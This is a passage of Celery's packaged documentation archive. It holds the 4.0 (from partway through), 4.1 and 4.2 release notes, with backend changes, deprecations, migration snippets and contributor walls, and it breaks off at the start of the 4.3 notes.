Kanemoto**. - ``State.tasks_by_type`` and ``State.tasks_by_worker`` can now be used as a mapping for fast access to this information. Deployment ~~~~~~~~~~ - Generic init-scripts now support :envvar:`CELERY_SU` and :envvar:`CELERYD_SU_ARGS` environment variables to set the path and arguments for :command:`su` (:manpage:`su(1)`). - Generic init-scripts now better support FreeBSD and other BSD systems by searching :file:`/usr/local/etc/` for the configuration file. Contributed by **Taha Jahangir**. - Generic init-script: Fixed strange bug for ``celerybeat`` where restart didn't always work (Issue #3018). - The systemd init script now uses a shell when executing services. Contributed by **Tomas Machalek**. Result Backends ~~~~~~~~~~~~~~~ - Redis: Now has a default socket timeout of 120 seconds. The default can be changed using the new :setting:`redis_socket_timeout` setting. Contributed by **Raghuram Srinivasan**. - RPC Backend result queues are now auto delete by default (Issue #2001). - RPC Backend: Fixed problem where exception wasn't deserialized properly with the json serializer (Issue #2518). Fix contributed by **Allard Hoeve**. - CouchDB: The backend used to double-json encode results. Fix contributed by **Andrew Stewart**. - CouchDB: Fixed typo causing the backend to not be found (Issue #3287). Fix contributed by **Andrew Stewart**. - MongoDB: Now supports setting the :setting:`result_serialzier` setting to ``bson`` to use the MongoDB libraries own serializer. Contributed by **Davide Quarta**. - MongoDB: URI handling has been improved to use database name, user and password from the URI if provided. Contributed by **Samuel Jaillet**. - SQLAlchemy result backend: Now ignores all result engine options when using NullPool (Issue #1930). - SQLAlchemy result backend: Now sets max char size to 155 to deal with brain damaged MySQL Unicode implementation (Issue #1748). - **General**: All Celery exceptions/warnings now inherit from common :class:`~celery.exceptions.CeleryError`/:class:`~celery.exceptions.CeleryWarning`. (Issue #2643). Documentation Improvements ~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by: - Adam Chainz - Amir Rustamzadeh - Arthur Vuillard - Batiste Bieler - Berker Peksag - Bryce Groff - Daniel Devine - Edward Betts - Jason Veatch - Jeff Widman - Maciej Obuchowski - Manuel Kaufmann - Maxime Beauchemin - Mitchel Humpherys - Pavlo Kapyshin - Pierre Fersing - Rik - Steven Sklar - Tayfun Sen - Wieland Hoffmann Reorganization, Deprecations, and Removals ========================================== Incompatible changes -------------------- - Prefork: Calling ``result.get()`` or joining any result from within a task now raises :exc:`RuntimeError`. In previous versions this would emit a warning. - :mod:`celery.worker.consumer` is now a package, not a module. - Module ``celery.worker.job`` renamed to :mod:`celery.worker.request`. - Beat: ``Scheduler.Publisher``/``.publisher`` renamed to ``.Producer``/``.producer``. - Result: The task_name argument/attribute of :class:`@AsyncResult` was removed. This was historically a field used for :mod:`pickle` compatibility, but is no longer needed. - Backends: Arguments named ``status`` renamed to ``state``. - Backends: ``backend.get_status()`` renamed to ``backend.get_state()``. - Backends: ``backend.maybe_reraise()`` renamed to ``.maybe_throw()`` The promise API uses .throw(), so this change was made to make it more consistent. There's an alias available, so you can still use maybe_reraise until Celery 5.0. .. _v400-unscheduled-removals: Unscheduled Removals -------------------- - The experimental :mod:`celery.contrib.methods` feature has been removed, as there were far many bugs in the implementation to be useful. - The CentOS init-scripts have been removed. These didn't really add any features over the generic init-scripts, so you're encouraged to use them instead, or something like :pypi:`supervisor`. .. _v400-deprecations-reorg: Reorganization Deprecations --------------------------- These symbols have been renamed, and while there's an alias available in this version for backward compatibility, they will be removed in Celery 5.0, so make sure you rename these ASAP to make sure it won't break for that release. Chances are that you'll only use the first in this list, but you never know: - ``celery.utils.worker_direct`` -> :meth:`celery.utils.nodenames.worker_direct`. - ``celery.utils.nodename`` -> :meth:`celery.utils.nodenames.nodename`. - ``celery.utils.anon_nodename`` -> :meth:`celery.utils.nodenames.anon_nodename`. - ``celery.utils.nodesplit`` -> :meth:`celery.utils.nodenames.nodesplit`. - ``celery.utils.default_nodename`` -> :meth:`celery.utils.nodenames.default_nodename`. - ``celery.utils.node_format`` -> :meth:`celery.utils.nodenames.node_format`. - ``celery.utils.host_format`` -> :meth:`celery.utils.nodenames.host_format`. .. _v400-removals: Scheduled Removals ------------------ Modules ~~~~~~~ - Module ``celery.worker.job`` has been renamed to :mod:`celery.worker.request`. This was an internal module so shouldn't have any effect. It's now part of the public API so must not change again. - Module ``celery.task.trace`` has been renamed to ``celery.app.trace`` as the ``celery.task`` package is being phased out. The module will be removed in version 5.0 so please change any import from:: from celery.task.trace import X to:: from celery.app.trace import X - Old compatibility aliases in the :mod:`celery.loaders` module has been removed. - Removed ``celery.loaders.current_loader()``, use: ``current_app.loader`` - Removed ``celery.loaders.load_settings()``, use: ``current_app.conf`` Result ~~~~~~ - ``AsyncResult.serializable()`` and ``celery.result.from_serializable`` has been removed: Use instead: .. code-block:: pycon >>> tup = result.as_tuple() >>> from celery.result import result_from_tuple >>> result = result_from_tuple(tup) - Removed ``BaseAsyncResult``, use ``AsyncResult`` for instance checks instead. - Removed ``TaskSetResult``, use ``GroupResult`` instead. - ``TaskSetResult.total`` -> ``len(GroupResult)`` - ``TaskSetResult.taskset_id`` -> ``GroupResult.id`` - Removed ``ResultSet.subtasks``, use ``ResultSet.results`` instead. TaskSet ~~~~~~~ TaskSet has been removed, as it was replaced by the ``group`` construct in Celery 3.0. If you have code like this: .. code-block:: pycon >>> from celery.task import TaskSet >>> TaskSet(add.subtask((i, i)) for i in xrange(10)).apply_async() You need to replace that with: .. code-block:: pycon >>> from celery import group >>> group(add.s(i, i) for i in xrange(10))() Events ~~~~~~ - Removals for class :class:`celery.events.state.Worker`: - ``Worker._defaults`` attribute. Use ``{k: getattr(worker, k) for k in worker._fields}``. - ``Worker.update_heartbeat`` Use ``Worker.event(None, timestamp, received)`` - ``Worker.on_online`` Use ``Worker.event('online', timestamp, received, fields)`` - ``Worker.on_offline`` Use ``Worker.event('offline', timestamp, received, fields)`` - ``Worker.on_heartbeat`` Use ``Worker.event('heartbeat', timestamp, received, fields)`` - Removals for class :class:`celery.events.state.Task`: - ``Task._defaults`` attribute. Use ``{k: getattr(task, k) for k in task._fields}``. - ``Task.on_sent`` Use ``Worker.event('sent', timestamp, received, fields)`` - ``Task.on_received`` Use ``Task.event('received', timestamp, received, fields)`` - ``Task.on_started`` Use ``Task.event('started', timestamp, received, fields)`` - ``Task.on_failed`` Use ``Task.event('failed', timestamp, received, fields)`` - ``Task.on_retried`` Use ``Task.event('retried', timestamp, received, fields)`` - ``Task.on_succeeded`` Use ``Task.event('succeeded', timestamp, received, fields)`` - ``Task.on_revoked`` Use ``Task.event('revoked', timestamp, received, fields)`` - ``Task.on_unknown_event`` Use ``Task.event(short_type, timestamp, received, fields)`` - ``Task.update`` Use ``Task.event(short_type, timestamp, received, fields)`` - ``Task.merge`` Contact us if you need this. Magic keyword arguments ~~~~~~~~~~~~~~~~~~~~~~~ Support for the very old magic keyword arguments accepted by tasks is finally removed in this version. If you're still using these you have to rewrite any task still using the old ``celery.decorators`` module and depending on keyword arguments being passed to the task, for example:: from celery.decorators import task @task() def add(x, y, task_id=None): print('My task id is %r' % (task_id,)) should be rewritten into:: from celery import task @task(bind=True) def add(self, x, y): print('My task id is {0.request.id}'.format(self)) Removed Settings ---------------- The following settings have been removed, and is no longer supported: Logging Settings ~~~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERYD_LOG_LEVEL`` :option:`celery worker --loglevel` ``CELERYD_LOG_FILE`` :option:`celery worker --logfile` ``CELERYBEAT_LOG_LEVEL`` :option:`celery beat --loglevel` ``CELERYBEAT_LOG_FILE`` :option:`celery beat --logfile` ``CELERYMON_LOG_LEVEL`` celerymon is deprecated, use flower ``CELERYMON_LOG_FILE`` celerymon is deprecated, use flower ``CELERYMON_LOG_FORMAT`` celerymon is deprecated, use flower ===================================== ===================================== Task Settings ~~~~~~~~~~~~~~ ===================================== ===================================== **Setting name** **Replace with** ===================================== ===================================== ``CELERY_CHORD_PROPAGATES`` N/A ===================================== ===================================== Changes to internal API ----------------------- - Module ``celery.datastructures`` renamed to :mod:`celery.utils.collections`. - Module ``celery.utils.timeutils`` renamed to :mod:`celery.utils.time`. - ``celery.utils.datastructures.DependencyGraph`` moved to :mod:`celery.utils.graph`. - ``celery.utils.jsonify`` is now :func:`celery.utils.serialization.jsonify`. - ``celery.utils.strtobool`` is now :func:`celery.utils.serialization.strtobool`. - ``celery.utils.is_iterable`` has been removed. Instead use: .. code-block:: python isinstance(x, collections.Iterable) - ``celery.utils.lpmerge`` is now :func:`celery.utils.collections.lpmerge`. - ``celery.utils.cry`` is now :func:`celery.utils.debug.cry`. - ``celery.utils.isatty`` is now :func:`celery.platforms.isatty`. - ``celery.utils.gen_task_name`` is now :func:`celery.utils.imports.gen_task_name`. - ``celery.utils.deprecated`` is now :func:`celery.utils.deprecated.Callable` - ``celery.utils.deprecated_property`` is now :func:`celery.utils.deprecated.Property`. - ``celery.utils.warn_deprecated`` is now :func:`celery.utils.deprecated.warn` .. _v400-deprecations: Deprecation Time-line Changes ============================= See the :ref:`deprecation-timeline`. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-4.1.rst0000664000175000017500000002006400000000000020222 0ustar00asifasif00000000000000.. _whatsnew-4.1: =========================================== What's new in Celery 4.1 (latentcall) =========================================== :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, 3.5 & 3.6 and is also supported on PyPy. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.1.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release is mainly a bug fix release, ironing out some issues and regressions found in Celery 4.0.0. We added official support for Python 3.6 and PyPy 5.8.0. This is the first time we release without Ask Solem as an active contributor. We'd like to thank him for his hard work in creating and maintaining Celery over the years. Since Ask Solem was not involved there were a few kinks in the release process which we promise to resolve in the next release. This document was missing when we did release Celery 4.1.0. Also, we did not update the release codename as we should have. We apologize for the inconvenience. For the time being, I, Omer Katz will be the release manager. Thank you for your support! *— Omer Katz* Wall of Contributors -------------------- Acey Acey9 Alan Hamlett Alan Justino da Silva Alejandro Pernin Alli Andreas Pelme Andrew de Quincey Anthony Lukach Arcadiy Ivanov Arnaud Rocher Arthur Vigil Asif Saifuddin Auvi Ask Solem BLAGA Razvan-Paul Brendan MacDonell Brian Luan Brian May Bruno Alla Chris Kuehl Christian Christopher Hoskin Daniel Hahler Daniel Huang Derek Harland Dmytro Petruk Ed Morley Eric Poelke Felipe François Voron GDR! George Psarakis J Alan Brogan James Michael DuPont Jamie Alessio Javier Domingo Cansino Jay McGrath Jian Yu Joey Wilhelm Jon Dufresne Kalle Bronsen Kirill Romanov Laurent Peuch Luke Plant Marat Sharafutdinov Marc Gibbons Marc Hörsken Michael Michael Howitz Michal Kuffa Mike Chen Mike Helmick Morgan Doocy Moussa Taifi Omer Katz Patrick Cloke Peter Bittner Preston Moore Primož Kerin Pysaoke Rick Wargo Rico Moorman Roman Sichny Ross Patterson Ryan Hiebert Rémi Marenco Salvatore Rinchiera Samuel Dion-Girardeau Sergey Fursov Simon Legner Simon Schmidt Slam <3lnc.slam@gmail.com> Static Steffen Allner Steven Steven Johns Tamer Sherif Tao Qingyun <845767657@qq.com> Tayfun Sen Taylor C. Richberger Thierry RAMORASOAVINA Tom 'Biwaa' Riat Viktor Holmqvist Viraj Vivek Anand Will Wojciech Żywno Yoichi NAKAYAMA YuLun Shih Yuhannaa abhinav nilaratna aydin csfeathers georgepsarakis orf shalev67 sww tnir 何翔宇(Sean Ho) .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. .. _v410-important: Important Notes =============== Added support for Python 3.6 & PyPy 5.8.0 ----------------------------------------- We now run our unit test suite and integration test suite on Python 3.6.x and PyPy 5.8.0. We expect newer versions of PyPy to work but unfortunately we do not have the resources to test PyPy with those versions. The supported Python Versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - CPython 3.6 - PyPy 5.8 (``pypy2``) .. _v410-news: News ==== Result Backends --------------- New DynamoDB Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We added a new results backend for those of you who are using DynamoDB. If you are interested in using this results backend, refer to :ref:`conf-dynamodb-result-backend` for more information. Elasticsearch ~~~~~~~~~~~~~ The Elasticsearch results backend is now more robust and configurable. See :ref:`conf-elasticsearch-result-backend` for more information about the new configuration options. Redis ~~~~~ The Redis results backend can now use TLS to encrypt the communication with the Redis database server. See :ref:`conf-redis-result-backend`. MongoDB ~~~~~~~ The MongoDB results backend can now handle binary-encoded task results. This was a regression from 4.0.0 which resulted in a problem using serializers such as MsgPack or Pickle in conjunction with the MongoDB results backend. Periodic Tasks -------------- The task schedule now updates automatically when new tasks are added. Now if you use the Django database scheduler, you can add and remove tasks from the schedule without restarting Celery beat. Tasks ----- The ``disable_sync_subtasks`` argument was added to allow users to override disabling synchronous subtasks. See :ref:`task-synchronous-subtasks` Canvas ------ Multiple bugs were resolved resulting in a much smoother experience when using Canvas. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-4.2.rst0000664000175000017500000010557700000000000020240 0ustar00asifasif00000000000000.. _whatsnew-4.2: =========================================== What's new in Celery 4.2 (windowlicker) =========================================== :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, 3.5 & 3.6 and is also supported on PyPy. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 2 Preface ======= The 4.2.0 release continues to improve our efforts to provide you with the best task execution platform for Python. This release is mainly a bug fix release, ironing out some issues and regressions found in Celery 4.0.0. Traditionally, releases were named after `Autechre `_'s track names. This release continues this tradition in a slightly different way. Each major version of Celery will use a different artist's track names as codenames. From now on, the 4.x series will be codenamed after `Aphex Twin `_'s track names. This release is codenamed after his very famous track, `Windowlicker `_. Thank you for your support! *— Omer Katz* Wall of Contributors -------------------- Aaron Harnly Aaron Harnly Aaron McMillin Aaron Ross Aaron Ross Aaron Schumacher abecciu abhinav nilaratna Acey9 Acey aclowes Adam Chainz Adam DePue Adam Endicott Adam Renberg Adam Venturella Adaptification Adrian adriano petrich Adrian Rego Adrien Guinet Agris Ameriks Ahmet Demir air-upc Aitor Gómez-Goiri Akira Matsuzaki Akshar Raaj Alain Masiero Alan Hamlett Alan Hamlett Alan Justino Alan Justino da Silva Albert Wang Alcides Viamontes Esquivel Alec Clowes Alejandro Pernin Alejandro Varas Aleksandr Kuznetsov Ales Zoulek Alexander Alexander A. Sosnovskiy Alexander Koshelev Alexander Koval Alexander Oblovatniy Alexander Oblovatniy Alexander Ovechkin Alexander Smirnov Alexandru Chirila Alexey Kotlyarov Alexey Zatelepin Alex Garel Alex Hill Alex Kiriukha Alex Koshelev Alex Rattray Alex Williams Alex Zaitsev Ali Bozorgkhan Allan Caffee Allard Hoeve allenling Alli Alman One Alman One alman-one Amir Rustamzadeh anand21nanda@gmail.com Anarchist666 Anders Pearson Andrea Rabbaglietti Andreas Pelme Andreas Savvides Andrei Fokau Andrew de Quincey Andrew Kittredge Andrew McFague Andrew Stewart Andrew Watts Andrew Wong Andrey Voronov Andriy Yurchuk Aneil Mallavarapu anentropic anh Ankur Dedania Anthony Lukach antlegrand <2t.antoine@gmail.com> Antoine Legrand Anton Anton Gladkov Antonin Delpeuch Arcadiy Ivanov areski Armenak Baburyan Armin Ronacher armo Arnaud Rocher arpanshah29 Arsenio Santos Arthur Vigil Arthur Vuillard Ashish Dubey Asif Saifuddin Auvi Asif Saifuddin Auvi ask Ask Solem Ask Solem Ask Solem Hoel aydin baeuml Balachandran C Balthazar Rouberol Balthazar Rouberol bartloop <38962178+bartloop@users.noreply.github.com> Bartosz Ptaszynski <> Batiste Bieler bee-keeper Bence Tamas Ben Firshman Ben Welsh Berker Peksag Bert Vanderbauwhede Bert Vanderbauwhede BLAGA Razvan-Paul bobbybeever bobby Bobby Powers Bohdan Rybak Brad Jasper Branko Čibej BR Brendan MacDonell Brendon Crawford Brent Watson Brian Bouterse Brian Dixon Brian Luan Brian May Brian Peiris Brian Rosner Brodie Rao Bruno Alla Bryan Berg Bryan Berg Bryan Bishop Bryan Helmig Bryce Groff Caleb Mingle Carlos Garcia-Dubus Catalin Iacob Charles McLaughlin Chase Seibert ChillarAnand Chris Adams Chris Angove Chris Chamberlin chrisclark Chris Harris Chris Kuehl Chris Martin Chris Mitchell Chris Rose Chris St. Pierre Chris Streeter Christian Christoph Burgmer Christopher Hoskin Christopher Lee Christopher Peplin Christopher Peplin Christoph Krybus clayg Clay Gerrard Clemens Wolff cmclaughlin Codeb Fan Colin McIntosh Conrad Kramer Corey Farwell Craig Younkins csfeathers Cullen Rhodes daftshady Dan Dan Hackner Daniel Devine Daniele Procida Daniel Hahler Daniel Hepper Daniel Huang Daniel Lundin Daniel Lundin Daniel Watkins Danilo Bargen Dan McGee Dan McGee Dan Wilson Daodao Dave Smith Dave Smith David Arthur David Arthur David Baumgold David Cramer David Davis David Harrigan David Harrigan David Markey David Miller David Miller David Pravec David Pravec David Strauss David White DDevine Denis Podlesniy Denis Shirokov Dennis Brakhane Derek Harland derek_kim dessant Dieter Adriaenssens Dima Kurguzov dimka665 dimlev dmarkey Dmitry Malinovsky Dmitry Malinovsky dmollerm Dmytro Petruk dolugen dongweiming dongweiming Dongweiming dtheodor Dudás Ádám Dustin J. Mitchell D. Yu Ed Morley Eduardo Ramírez Edward Betts Emil Stanchev Eran Rundstein ergo Eric Poelke Eric Zarowny ernop Evgeniy evildmp fatihsucu Fatih Sucu Feanil Patel Felipe Felipe Godói Rosário Felix Berger Fengyuan Chen Fernando Rocha ffeast Flavio Percoco Premoli Florian Apolloner Florian Apolloner Florian Demmer flyingfoxlee Francois Visconte François Voron Frédéric Junod fredj frol Gabriel Gao Jiangmiao GDR! GDvalle Geoffrey Bauduin georgepsarakis George Psarakis George Sibble George Tantiras Georgy Cheshkov Gerald Manipon German M. Bravo Gert Van Gool Gilles Dartiguelongue Gino Ledesma gmanipon Grant Thomas Greg Haskins gregoire Greg Taylor Greg Wilbur Guillaume Gauvrit Guillaume Gendre Gun.io Whitespace Robot Gunnlaugur Thor Briem harm Harm Verhagen Harry Moreno hclihn <23141651+hclihn@users.noreply.github.com> hekevintran honux Honza Kral Honza Král Hooksie Hsiaoming Yang Huang Huang Hynek Schlawack Hynek Schlawack Ian Dees Ian McCracken Ian Wilson Idan Kamara Ignas Mikalajūnas Igor Kasianov illes Ilya <4beast@gmail.com> Ilya Georgievsky Ionel Cristian Mărieș Ionel Maries Cristian Ionut Turturica Iurii Kriachko Ivan Metzlar Ivan Virabyan j0hnsmith Jackie Leng J Alan Brogan Jameel Al-Aziz James M. Allen James Michael DuPont James Pulec James Remeika Jamie Alessio Jannis Leidel Jared Biel Jason Baker Jason Baker Jason Veatch Jasper Bryant-Greene Javier Domingo Cansino Javier Martin Montull Jay Farrimond Jay McGrath jbiel jbochi Jed Smith Jeff Balogh Jeff Balogh Jeff Terrace Jeff Widman Jelle Verstraaten Jeremy Cline Jeremy Zafran jerry Jerzy Kozera Jerzy Kozera jespern Jesper Noehr Jesse jess Jess Johnson Jian Yu JJ João Ricardo Jocelyn Delalande JocelynDelalande Joe Jevnik Joe Sanford Joe Sanford Joey Wilhelm John Anderson John Arnold John Barham John Watson John Watson John Watson John Whitlock Jonas Haag Jonas Obrist Jonatan Heyman Jonathan Jordan Jonathan Sundqvist jonathan vanasco Jon Chen Jon Dufresne Josh Josh Kupershmidt Joshua "jag" Ginsberg Josue Balandrano Coronel Jozef jpellerin jpellerin JP JTill Juan Gutierrez Juan Ignacio Catalano Juan Rossi Juarez Bochi Jude Nagurney Julien Deniau julienp Julien Poissonnier Jun Sakai Justin Patrin Justin Patrin Kalle Bronsen kamalgill Kamil Breguła Kanan Rahimov Kareem Zidane Keith Perkins Ken Fromm Ken Reese keves Kevin Gu Kevin Harvey Kevin McCarthy Kevin Richardson Kevin Richardson Kevin Tran Kieran Brownlees Kirill Pavlov Kirill Romanov komu Konstantinos Koukopoulos Konstantin Podshumok Kornelijus Survila Kouhei Maeda Kracekumar Ramaraju Krzysztof Bujniewicz kuno Kxrr Kyle Kelley Laurent Peuch lead2gold Leo Dirac Leo Singer Lewis M. Kabui llllllllll Locker537 Loic Bistuer Loisaida Sam lookfwd Loren Abrams Loren Abrams Lucas Wiman lucio Luis Clara Gomez Lukas Linhart Łukasz Kożuchowski Łukasz Langa Łukasz Oleś Luke Burden Luke Hutscal Luke Plant Luke Pomfrey Luke Zapart mabouels Maciej Obuchowski Mads Jensen Manuel Kaufmann Manuel Vázquez Acosta Marat Sharafutdinov Marcelo Da Cruz Pinto Marc Gibbons Marc Hörsken Marcin Kuźmiński marcinkuzminski Marcio Ribeiro Marco Buttu Marco Schweighauser mariia-zelenova <32500603+mariia-zelenova@users.noreply.github.com> Marin Atanasov Nikolov Marius Gedminas mark hellewell Mark Lavin Mark Lavin Mark Parncutt Mark Story Mark Stover Mark Thurman Markus Kaiserswerth Markus Ullmann martialp Martin Davidsson Martin Galpin Martin Melin Matt Davis Matthew Duggan Matthew J Morrison Matthew Miller Matthew Schinckel mattlong Matt Long Matt Robenolt Matt Robenolt Matt Williamson Matt Williamson Matt Wise Matt Woodyard Mauro Rocco Maxim Bodyansky Maxime Beauchemin Maxime Vdb Mayflower mbacho mher Mher Movsisyan Michael Aquilina Michael Duane Mooring Michael Elsdoerfer michael@elsdoerfer.com Michael Elsdorfer Michael Elsdörfer Michael Fladischer Michael Floering Michael Howitz michael Michael michael Michael Peake Michael Permana Michael Permana Michael Robellard Michael Robellard Michal Kuffa Miguel Hernandez Martos Mike Attwood Mike Chen Mike Helmick mikemccabe Mikhail Gusarov Mikhail Korobov Mikołaj Milen Pavlov Misha Wolfson Mitar Mitar Mitchel Humpherys mklauber mlissner monkut Morgan Doocy Morris Tweed Morton Fox Môshe van der Sterre Moussa Taifi mozillazg mpavlov mperice mrmmm Muneyuki Noguchi m-vdb nadad Nathaniel Varona Nathan Van Gheem Nat Williams Neil Chintomby Neil Chintomby Nicholas Pilon nicholsonjf Nick Eaket <4418194+neaket360pi@users.noreply.github.com> Nick Johnson Nicolas Mota nicolasunravel Niklas Aldergren Noah Kantrowitz Noel Remy NoKriK Norman Richards NotSqrt nott ocean1 ocean1 ocean1 OddBloke Oleg Anashkin Olivier Aubert Omar Khan Omer Katz Omer Korner orarbel orf Ori Hoch outself Pablo Marti pachewise partizan Pär Wieslander Patrick Altman Patrick Cloke Patrick Patrick Stegmann Patrick Stegmann Patrick Zhang Paul English Paul Jensen Paul Kilgo Paul McMillan Paul McMillan Paulo Paul Pearce Pavel Savchenko Pavlo Kapyshin pegler Pepijn de Vos Peter Bittner Peter Brook Philip Garnero Pierre Fersing Piotr Maślanka Piotr Sikora PMickael PMickael Polina Giralt precious Preston Moore Primož Kerin Pysaoke Rachel Johnson Rachel Willmer raducc Raf Geens Raghuram Srinivasan Raphaël Riel Raphaël Slinckx Régis B Remigiusz Modrzejewski Rémi Marenco rfkrocktk Rick van Hattem Rick Wargo Rico Moorman Rik Rinat Shigapov Riyad Parvez rlotun rnoel Robert Knight Roberto Gaiser roderick Rodolphe Quiedeville Roger Hu Roger Hu Roman Imankulov Roman Sichny Romuald Brunet Ronan Amicel Ross Deane Ross Lawley Ross Patterson Ross Rudy Attias rumyana neykova Rumyana Neykova Rune Halvorsen Rune Halvorsen runeh Russell Keith-Magee Ryan Guest Ryan Hiebert Ryan Kelly Ryan Luckie Ryan Petrello Ryan P. Kelly Ryan P Kilby Salvatore Rinchiera Sam Cooke samjy Sammie S. Taunton Samuel Dion-Girardeau Samuel Dion-Girardeau Samuel GIFFARD Scott Cooper screeley sdcooke Sean O'Connor Sean Wang Sebastian Kalinowski Sébastien Fievet Seong Won Mun Sergey Fursov Sergey Tikhonov Sergi Almacellas Abellana Sergio Fernandez Seungha Kim shalev67 Shitikanth Silas Sewell Simon Charette Simon Engledew Simon Josi Simon Legner Simon Peeters Simon Schmidt skovorodkin Slam <3lnc.slam@gmail.com> Smirl squfrans Srinivas Garlapati Stas Rudakou Static Steeve Morin Stefan hr Berder Stefan Kjartansson Steffen Allner Stephen Weber Steven Johns Steven Parker Steven Steven Sklar Steven Skoczen Steven Skoczen Steve Peak stipa sukrit007 Sukrit Khera Sundar Raman sunfinite sww Tadej Janež Taha Jahangir Takeshi Kanemoto TakesxiSximada Tamer Sherif Tao Qingyun <845767657@qq.com> Tarun Bhardwaj Tayfun Sen Tayfun Sen Tayfun Sen tayfun Taylor C. Richberger taylornelson Theodore Dubois Theo Spears Thierry RAMORASOAVINA Thijs Triemstra Thomas French Thomas Grainger Thomas Johansson Thomas Meson Thomas Minor Thomas Wright Timo Sugliani Timo Sugliani Titusz tnir Tobias Kunze Tocho Tochev Tomas Machalek Tomasz Święcicki Tom 'Biwaa' Riat Tomek Święcicki Tom S tothegump Travis Swicegood Travis Swicegood Travis Trevor Skaggs Ujjwal Ojha unknown Valentyn Klindukh Viktor Holmqvist Vincent Barbaresi Vincent Driessen Vinod Chandru Viraj Vitaly Babiy Vitaly Vivek Anand Vlad Vladimir Gorbunov Vladimir Kryachko Vladimir Rutsky Vladislav Stepanov <8uk.8ak@gmail.com> Vsevolod Wes Turner wes Wes Winham w- whendrik Wido den Hollander Wieland Hoffmann Wiliam Souza Wil Langford William King Will Will Thompson winhamwr Wojciech Żywno W. Trevor King wyc wyc xando Xavier Damman Xavier Hardy Xavier Ordoquy xin li xray7224 y0ngdi <36658095+y0ngdi@users.noreply.github.com> Yan Kalchevskiy Yohann Rebattu Yoichi NAKAYAMA Yuhannaa YuLun Shih Yury V. Zaytsev Yuval Greenfield Zach Smith Zhang Chi Zhaorong Ma Zoran Pavlovic ztlpn 何翔宇(Sean Ho) 許邱翔 .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. .. _v420-important: Important Notes =============== Supported Python Versions ------------------------- The supported Python Versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - CPython 3.6 - PyPy 5.8 (``pypy2``) .. _v420-news: News ==== Result Backends --------------- New Redis Sentinel Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Redis Sentinel provides high availability for Redis. A new result backend supporting it was added. Cassandra Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~~ A new `cassandra_options` configuration option was introduced in order to configure the cassandra client. See :ref:`conf-cassandra-result-backend` for more information. DynamoDB Results Backend ~~~~~~~~~~~~~~~~~~~~~~~~ A new `dynamodb_endpoint_url` configuration option was introduced in order to point the result backend to a local endpoint during development or testing. See :ref:`conf-dynamodb-result-backend` for more information. Python 2/3 Compatibility Fixes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Both the CouchDB and the Consul result backends accepted byte strings without decoding them to Unicode first. This is now no longer the case. Canvas ------ Multiple bugs were resolved resulting in a much smoother experience when using Canvas. Tasks ----- Bound Tasks as Error Callbacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We fixed a regression that occurred when bound tasks are used as error callbacks. This used to work in Celery 3.x but raised an exception in 4.x until this release. In both 4.0 and 4.1 the following code wouldn't work: .. code-block:: python @app.task(name="raise_exception", bind=True) def raise_exception(self): raise Exception("Bad things happened") @app.task(name="handle_task_exception", bind=True) def handle_task_exception(self): print("Exception detected") subtask = raise_exception.subtask() subtask.apply_async(link_error=handle_task_exception.s()) Task Representation ~~~~~~~~~~~~~~~~~~~ - Shadowing task names now works as expected. The shadowed name is properly presented in flower, the logs and the traces. - `argsrepr` and `kwargsrepr` were previously not used even if specified. They now work as expected. See :ref:`task-hiding-sensitive-information` for more information. Custom Requests ~~~~~~~~~~~~~~~ We now allow tasks to use custom `request `:class: classes for custom task classes. See :ref:`task-requests-and-custom-requests` for more information. Retries with Exponential Backoff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Retries can now be performed with exponential backoffs to avoid overwhelming external services with requests. See :ref:`task-autoretry` for more information. Sphinx Extension ---------------- Tasks were supposed to be automatically documented when using Sphinx's Autodoc was used. The code that would have allowed automatic documentation had a few bugs which are now fixed. Also, The extension is now documented properly. See :ref:`sphinx` for more information. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-4.3.rst0000664000175000017500000004074100000000000020230 0ustar00asifasif00000000000000.. _whatsnew-4.3: =================================== What's new in Celery 4.3 (rhubarb) =================================== :Author: Omer Katz (``omer.drow at gmail.com``) .. sidebar:: Change history What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section. Celery is a simple, flexible, and 